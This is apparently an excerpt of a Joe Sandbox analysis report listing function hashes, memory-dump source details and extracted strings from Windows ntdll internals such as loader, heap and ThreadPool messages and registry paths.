                                                                                                                                              • Opcode ID: 857e608d07b12c396b769c89775a8b402f6c65318c489ab5e13d382b366e6ada
                                                                                                                                              • Instruction ID: 5eb0215e0639544766b4bf8f8b367554e0fc42bfe4ec208af2ae0c8bcc76a3ef
                                                                                                                                              • Opcode Fuzzy Hash: 857e608d07b12c396b769c89775a8b402f6c65318c489ab5e13d382b366e6ada
                                                                                                                                              • Instruction Fuzzy Hash: CC139D70A00259DFEF29CF6DC480BA9BBB5BF49304F1485ADD949AB382D734A945CF90
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                                                                              • API String ID: 0-3570731704
                                                                                                                                              • Opcode ID: a5cfef5f95eac02ada6746d6b2f5c296018cdba1c0f71f996319ee4016f09070
                                                                                                                                              • Instruction ID: 84c6ac2e6ff83f3fb5ca4b5d88d7bfdafe4e497a6e4aeae6ff0f208151a18a71
                                                                                                                                              • Opcode Fuzzy Hash: a5cfef5f95eac02ada6746d6b2f5c296018cdba1c0f71f996319ee4016f09070
                                                                                                                                              • Instruction Fuzzy Hash: A3923875A0122ACFEF25CF18C844BA9B7B9BF45325F0581EAD94DAB291D7309E80CF51
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                              • API String ID: 0-379654539
                                                                                                                                              • Opcode ID: 21a0efa0b17c411f5a0b5c63512c30d1a16b6cff9248ab126eb7c52bf2e951ac
                                                                                                                                              • Instruction ID: 52bb3a57f8029428d1781bd91a7af89609decb03e6519d047ee48078437f80c4
                                                                                                                                              • Opcode Fuzzy Hash: 21a0efa0b17c411f5a0b5c63512c30d1a16b6cff9248ab126eb7c52bf2e951ac
                                                                                                                                              • Instruction Fuzzy Hash: 59C19E71508382CFD712EF68C044B6AB7E8FF84704F04486EF9999B251E738CA45CB62
                                                                                                                                              Strings
                                                                                                                                              • LdrpInitializeProcess, xrefs: 019B8422
                                                                                                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 019B855E
                                                                                                                                              • @, xrefs: 019B8591
                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 019B8421
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                              • API String ID: 0-1918872054
                                                                                                                                              • Opcode ID: 8c839011bea4d0c243a359dbe3e9a6584e374f1274c63c2c8e8103fdfd60f66b
                                                                                                                                              • Instruction ID: de5f9966885071bf5562365ed4a33bee676a4cf2f4310056bc96997a7c1f2f41
                                                                                                                                              • Opcode Fuzzy Hash: 8c839011bea4d0c243a359dbe3e9a6584e374f1274c63c2c8e8103fdfd60f66b
                                                                                                                                              • Instruction Fuzzy Hash: 29916D71508345AFE721DF65CD80FABBAECBB88744F40092EFA8C96151E774D9448B52
                                                                                                                                              Strings
                                                                                                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 019E0FE5
                                                                                                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 019E106B
                                                                                                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 019E1028
                                                                                                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 019E10AE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                              • API String ID: 0-1468400865
                                                                                                                                              • Opcode ID: 9d9e86d6c28c57d54ff8dbcafc8246b92529647185906a575267c9caadabc4c2
                                                                                                                                              • Instruction ID: 8cd8883db6c413cd1dc7866ba5dbbb2856f4b9cc58268161a88b096736ef6aa6
                                                                                                                                              • Opcode Fuzzy Hash: 9d9e86d6c28c57d54ff8dbcafc8246b92529647185906a575267c9caadabc4c2
                                                                                                                                              • Instruction Fuzzy Hash: F971AFB19043059FDB21EF18C885F9B7FA8AF95764F440868F94C8B246D774D588CBE2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                                                              • API String ID: 0-336120773
                                                                                                                                              • Opcode ID: d572f1b37d1cb395e1714393a39b3aa356f62c4b15244153f3ba486d02c45594
                                                                                                                                              • Instruction ID: 78036ec9b00ff6399669d1bde71d11da38937a5d193249da768cfac42aa3cc3f
                                                                                                                                              • Opcode Fuzzy Hash: d572f1b37d1cb395e1714393a39b3aa356f62c4b15244153f3ba486d02c45594
                                                                                                                                              • Instruction Fuzzy Hash: AF312472200200EFD711DBD8CC85F66B7E8EFC8768F190069F51ADB291EA31AC40CB65
                                                                                                                                              Strings
                                                                                                                                              • LdrpDynamicShimModule, xrefs: 019EA998
                                                                                                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 019EA992
                                                                                                                                              • apphelp.dll, xrefs: 019A2462
                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 019EA9A2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                              • API String ID: 0-176724104
                                                                                                                                              • Opcode ID: 3d8a5d3f969c2b8dfeabe5726e9d5537d63bb47169c9038c1b2671248c902df2
                                                                                                                                              • Instruction ID: 8215146ea74abbb66d6bb25b3ae94ccf97edcaf0c829eb7b8b283b92e1b2f589
                                                                                                                                              • Opcode Fuzzy Hash: 3d8a5d3f969c2b8dfeabe5726e9d5537d63bb47169c9038c1b2671248c902df2
                                                                                                                                              • Instruction Fuzzy Hash: 31312879A00301ABDB32DF5DDC49EAAB7F9FFC4B00F160019E90867265C7749A46C780
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                                              • API String ID: 0-1391187441
                                                                                                                                              • Opcode ID: 1ab4affc26d06deb708a056590646dbaa62cb8c8f756ccfc88785b84e0f51f56
                                                                                                                                              • Instruction ID: 39eec217cff19a3da1d61e277a4dfb6981929aac4e7ceabee20ddec4ed533177
                                                                                                                                              • Opcode Fuzzy Hash: 1ab4affc26d06deb708a056590646dbaa62cb8c8f756ccfc88785b84e0f51f56
                                                                                                                                              • Instruction Fuzzy Hash: A0319E32600205EFDB01DB59CC84FAABBF8FF85B75F168059E91DA7291D670E940CB61
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: $ $0
                                                                                                                                              • API String ID: 0-3352262554
                                                                                                                                              • Opcode ID: 41d7acc078e6aa322456467e070dfcae834279999290009b8433b1f6ddb70c5f
                                                                                                                                              • Instruction ID: 72492066a5037980e4eb1c71c1946506c1138b7f86a9b383c2ed9fb6cd58fc7b
                                                                                                                                              • Opcode Fuzzy Hash: 41d7acc078e6aa322456467e070dfcae834279999290009b8433b1f6ddb70c5f
                                                                                                                                              • Instruction Fuzzy Hash: E93225B16083A18FE720CF68C984B5BBBE5BF88708F04492EF59987350D775E949CB52
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                              • API String ID: 0-2779062949
                                                                                                                                              • Opcode ID: 2bc0600f6c125098dba0e3f246c04eed8517a169cbb2da3d91b1d9341d1cad91
                                                                                                                                              • Instruction ID: cf0b4ea0b84afb274026637233e5bfbeb46387a716f55a0084a41659b6f8ba14
                                                                                                                                              • Opcode Fuzzy Hash: 2bc0600f6c125098dba0e3f246c04eed8517a169cbb2da3d91b1d9341d1cad91
                                                                                                                                              • Instruction Fuzzy Hash: EEA16B759116299BDB31DF68CC88BEAB7B8EF44B10F1041EAE90CA7250DB359E85CF50
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                                                                              • API String ID: 0-373624363
                                                                                                                                              • Opcode ID: e18aaf062fca61baa9fb781e0d2f2a8b28d97232c18ec4cbccdc6a434a674cff
                                                                                                                                              • Instruction ID: df7bb2454bc566aedf38854695263866d8f7c1e17c3d55ad000af77b27421be9
                                                                                                                                              • Opcode Fuzzy Hash: e18aaf062fca61baa9fb781e0d2f2a8b28d97232c18ec4cbccdc6a434a674cff
                                                                                                                                              • Instruction Fuzzy Hash: F591F371A0420ACFEB22DF58C444BAE7BF4FF05725F184595E81AAB291D378DA41CBA0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: %$&$@
                                                                                                                                              • API String ID: 0-1537733988
                                                                                                                                              • Opcode ID: bdaa6c9f65d23a414b31241fb9130019424cd5ab4e9c7eb74e102374f02b05c3
                                                                                                                                              • Instruction ID: cadd7c9bf42c22cf7b46a419a8031e26c0b61a148892ad7329b5140e8d5b6f36
                                                                                                                                              • Opcode Fuzzy Hash: bdaa6c9f65d23a414b31241fb9130019424cd5ab4e9c7eb74e102374f02b05c3
                                                                                                                                              • Instruction Fuzzy Hash: A571B0B09193029FD715DF24CAC0AABBBE9BFC5618F108A1DF69E47251C730D905CB92
                                                                                                                                              Strings
                                                                                                                                              • minkernel\ntdll\ldrmap.c, xrefs: 019EA59A
                                                                                                                                              • Could not validate the crypto signature for DLL %wZ, xrefs: 019EA589
                                                                                                                                              • LdrpCompleteMapModule, xrefs: 019EA590
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                                              • API String ID: 0-1676968949
                                                                                                                                              • Opcode ID: d963feacea5b646c42af41a095c6abde4943e77c241cb8b6b3ccc0b1e6fe2e0a
                                                                                                                                              • Instruction ID: 000ccf0a12854cb6ebc923e966765309a59bc3c859b5abece9fdd7c6b8232c09
                                                                                                                                              • Opcode Fuzzy Hash: d963feacea5b646c42af41a095c6abde4943e77c241cb8b6b3ccc0b1e6fe2e0a
                                                                                                                                              • Instruction Fuzzy Hash: FE5116306007459BEB22CF6CCA48F2A7BE8BF40764F580565FA59DB6E2D774E904CB80
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                                                                              • API String ID: 0-1151232445
                                                                                                                                              • Opcode ID: 3cf63bb3ec7fccfb7c421363c5433bfbdb35124729ff8195e1f99bbd9b01a3f4
                                                                                                                                              • Instruction ID: b8caf0f60d4f02304f0d993b42f35ce5536e42287944f7d069649f3d8b5afbec
                                                                                                                                              • Opcode Fuzzy Hash: 3cf63bb3ec7fccfb7c421363c5433bfbdb35124729ff8195e1f99bbd9b01a3f4
                                                                                                                                              • Instruction Fuzzy Hash: 604129B03002409FEF3ECAACC588B797BE59F41355F1884E9D54E8B28BD674D895C752
                                                                                                                                              Strings
                                                                                                                                              • PreferredUILanguages, xrefs: 01A3C212
                                                                                                                                              • @, xrefs: 01A3C1F1
                                                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01A3C1C5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                              • API String ID: 0-2968386058
                                                                                                                                              • Opcode ID: e4d544d153458d22da09b78eeccbf84c9054a80633f66f0147d5b11ffd58630b
                                                                                                                                              • Instruction ID: 0ea7d1e15762d2191edda0bae02f7d7ec9b9c5cd99596c613b5aa066d4ce9406
                                                                                                                                              • Opcode Fuzzy Hash: e4d544d153458d22da09b78eeccbf84c9054a80633f66f0147d5b11ffd58630b
                                                                                                                                              • Instruction Fuzzy Hash: 23415572E00219EBDF11EBD8CC51FEEBBB8AB94710F14416BFA09B7244D7749A448B90
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                              • API String ID: 0-1373925480
                                                                                                                                              • Opcode ID: e4a401b3f7d1ba88aae95c4b9ce4eb8f815b7faa003cdb1af3b8ee6360b5c93e
                                                                                                                                              • Instruction ID: 5c251cf2bce81f8827da158355a9a01d6d3ce88423c50abbbbef31baa5db11d4
                                                                                                                                              • Opcode Fuzzy Hash: e4a401b3f7d1ba88aae95c4b9ce4eb8f815b7faa003cdb1af3b8ee6360b5c93e
                                                                                                                                              • Instruction Fuzzy Hash: B7412232A047588BEB26DBEDC840BEDBBB9FF99340F28045AD905EB785D7348941CB50
                                                                                                                                              Strings
                                                                                                                                              • Actx , xrefs: 019B33AC
                                                                                                                                              • SXS: %s() passed the empty activation context data, xrefs: 019F29FE
                                                                                                                                              • RtlCreateActivationContext, xrefs: 019F29F9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                                                                              • API String ID: 0-859632880
                                                                                                                                              • Opcode ID: 22b9682c4c7eb820e6ccce3d151a16e36972ccb0d165a71d91247fb72a712ffa
                                                                                                                                              • Instruction ID: 7884f93df0e6a6ead7d5eff5058c67b68bc89fe5dca453733e27d12cb8a7a245
                                                                                                                                              • Opcode Fuzzy Hash: 22b9682c4c7eb820e6ccce3d151a16e36972ccb0d165a71d91247fb72a712ffa
                                                                                                                                              • Instruction Fuzzy Hash: 90312436600705AFEB22DF69D9C4F967BA9BB44B11F054469EE0C9F281C734E945C790
                                                                                                                                              Strings
                                                                                                                                              • @, xrefs: 01A0B670
                                                                                                                                              • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 01A0B632
                                                                                                                                              • GlobalFlag, xrefs: 01A0B68F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                                                                              • API String ID: 0-4192008846
                                                                                                                                              • Opcode ID: eacc03078076790b4023d8a2f580eca4388cee1a2cf4b920d7d3b81a1c19dbcd
                                                                                                                                              • Instruction ID: b768bc1121edfd58e775577b69972000af7b0d6b9a0ce8c8e54d54e4be3088ff
                                                                                                                                              • Opcode Fuzzy Hash: eacc03078076790b4023d8a2f580eca4388cee1a2cf4b920d7d3b81a1c19dbcd
                                                                                                                                              • Instruction Fuzzy Hash: FD315EB5E00209AFEB11EF99DD80AEFBB7CEF44744F140469E609A7190D7749E00CBA4
                                                                                                                                              Strings
                                                                                                                                              • @, xrefs: 019C12A5
                                                                                                                                              • BuildLabEx, xrefs: 019C130F
                                                                                                                                              • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 019C127B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                              • API String ID: 0-3051831665
                                                                                                                                              • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                                                                              • Instruction ID: 4f8071a3e45aa079f9099e9196f12a00137d9e454efb9c066a5538d441da0399
                                                                                                                                              • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                                                                              • Instruction Fuzzy Hash: 04319072900519FFDB12EF95CC44EDEBBBDEB94A54F004429EA48A7260D730DA058B65
                                                                                                                                              Strings
                                                                                                                                              • LdrpInitializationFailure, xrefs: 01A020FA
                                                                                                                                              • Process initialization failed with status 0x%08lx, xrefs: 01A020F3
                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01A02104
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                              • API String ID: 0-2986994758
                                                                                                                                              • Opcode ID: 17335ae9e547d886188b3affa2b3d817716d97796b0d311718aebdc475f609d4
                                                                                                                                              • Instruction ID: 55c6074acaaf9b72a7d12771fb6ca4da73b648ee395dc980b26a7680bd926db5
                                                                                                                                              • Opcode Fuzzy Hash: 17335ae9e547d886188b3affa2b3d817716d97796b0d311718aebdc475f609d4
                                                                                                                                              • Instruction Fuzzy Hash: 52F0C239A40308BBEB25E74CED56F99776CFBC0B54F510069FA48772C5D2B0AA01CB92
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                              • String ID: #%u
                                                                                                                                              • API String ID: 48624451-232158463
                                                                                                                                              • Opcode ID: 5df8c85d049f369e9d741ca80b1a96854a6c3e13e0cec4ee5af184b3bae55b95
                                                                                                                                              • Instruction ID: 4ad5d5adf17bec72113f5a1e0a15c820508503681b2a29c2f42e270b065625ce
                                                                                                                                              • Opcode Fuzzy Hash: 5df8c85d049f369e9d741ca80b1a96854a6c3e13e0cec4ee5af184b3bae55b95
                                                                                                                                              • Instruction Fuzzy Hash: 58715B71A0014A9FDF02DFA9C994FAEB7F8BF48744F144065E909E7251EA34EE41CBA1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @$@
                                                                                                                                              • API String ID: 0-149943524
                                                                                                                                              • Opcode ID: 615894139b1a0937927f47eb8b5c84bf1b5b82ab399314f7f5bfe64845e13fb0
                                                                                                                                              • Instruction ID: c03c9278c27655153f7a1a62254cb65b2fc53e393b61b0b599cd0766304b17aa
                                                                                                                                              • Opcode Fuzzy Hash: 615894139b1a0937927f47eb8b5c84bf1b5b82ab399314f7f5bfe64845e13fb0
                                                                                                                                              • Instruction Fuzzy Hash: D6328E705083118BEB26CF1DC484B3FBBE9AF94745F15491EFA899B290E734D984CB92
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: `$`
                                                                                                                                              • API String ID: 0-197956300
                                                                                                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                              • Instruction ID: 8df248991102378b9e8f7770df82ca86b51ed27eb1fd88dc8e68d13698fd1f17
                                                                                                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                              • Instruction Fuzzy Hash: 4FC1D2312443429BEB25CF28C941B6BBBE5BFC4318F084A2DF69ACB291D774D505CB82
                                                                                                                                              Strings
                                                                                                                                              • kLsE, xrefs: 01980540
                                                                                                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0198063D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                              • API String ID: 0-2547482624
                                                                                                                                              • Opcode ID: e78284fcf51d1c9986e3f5fbfdc89f85d22517dacddad4dcaa6067cbb910cdf4
                                                                                                                                              • Instruction ID: ee0fcb4285b97d27dc73028129ee505f1ebbc10aab9243d82ad772d18a69d4d0
                                                                                                                                              • Opcode Fuzzy Hash: e78284fcf51d1c9986e3f5fbfdc89f85d22517dacddad4dcaa6067cbb910cdf4
                                                                                                                                              • Instruction Fuzzy Hash: 3551CF715007468FD724EF29C4406A7BBE8AF84309F18493EFA9D87241E730D549CBA2
                                                                                                                                              Strings
                                                                                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 0198A309
                                                                                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 0198A2FB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                              • API String ID: 0-2876891731
                                                                                                                                              • Opcode ID: 28658a9502759c65830db4d4b120490dba1612e23ddb4cde9746664884318248
                                                                                                                                              • Instruction ID: eb50b4383db417738b0ddd70053ee1cc715b7556b45ac16dc623955ff5bf29a2
                                                                                                                                              • Opcode Fuzzy Hash: 28658a9502759c65830db4d4b120490dba1612e23ddb4cde9746664884318248
                                                                                                                                              • Instruction Fuzzy Hash: 6F41AF30A04649DFDB26DF69C444F6D7BF8FF85701F1844AAE908DB291E275D900CB50
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_1950000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                                                              • API String ID: 0-118005554
                                                                                                                                              • Opcode ID: c05c5bdbfbe032a5d969ce47a4859ffd80c8c32eda81c4feffd8056e1ee1d02b
                                                                                                                                              • Instruction ID: 14aeb47db337eb5cc58522141e8f56adbf5406684c306454e7131ab4fcdc0af6
                                                                                                                                              • Opcode Fuzzy Hash: c05c5bdbfbe032a5d969ce47a4859ffd80c8c32eda81c4feffd8056e1ee1d02b
                                                                                                                                              • Instruction Fuzzy Hash: D931BE312087429FE711DF29D854B2BBBE4FF85724F080869F9A48B394EB34D905CB92
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
